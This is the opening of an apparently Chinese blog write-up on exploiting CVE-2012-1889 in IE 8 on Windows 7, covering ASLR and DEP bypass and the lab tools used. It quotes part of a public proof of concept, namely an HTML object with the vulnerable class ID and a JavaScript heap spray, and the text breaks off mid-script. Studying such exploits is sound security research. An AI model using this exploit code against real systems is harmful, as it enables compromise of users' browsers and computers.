前言在xp下写利用代码不需要考虑ASLR+DEP的问题,在win7下一般是通过msvcr71.dll进行rop利用,在没有安装java的情况下则不会加载msvcr71.dll,本人也是好奇如果电脑没有java环境那这个漏洞怎么利用? 有没有别的利用办法?
选择这个漏洞是因为这个漏洞简单暴力,相对于其他漏洞更加便于利用。实验环境操作系统:Windows 7 sp1浏览器:IE 8.0 7601.17514调试器:IDA、x64dbg、ImmunityDebugger其他工具:Metasploit漏洞验证漏洞触发poc:这是网上找到一个poc:html>head>title>CVE 2012-1889 PoCtitle>head>body>object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'>object>script>var obj = document.getElementById('poc').object;var src = unescape("%u0c0c%u0c0c");while (src.length 0x1002) src += src;src = "\\\\xxx" + src;src = src.substr(0, 0x1000 - 10);var pic =
………………………………